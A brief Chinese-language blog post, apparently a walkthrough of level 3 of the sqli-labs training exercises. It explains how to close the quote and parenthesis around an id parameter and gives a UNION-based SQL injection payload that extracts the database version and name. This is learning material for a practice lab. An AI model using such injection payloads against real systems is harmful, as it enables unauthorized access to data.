SQLI DUMB SERIES-3

less3

输入?id=1'

说明输入的id旁边加了单引号和括号('id'),直接在1后面加入“ ') ”,闭合前面的单引号和括号。

方法同less1相同。

例如:查询PHP版本和数据库名字

?id=1') union select 1,version(),database() %23

 

 

 

 

 

 

 

 

posted @ 2019-03-01 22:23  DurianTRY  阅读(711)  评论(0编辑  收藏  举报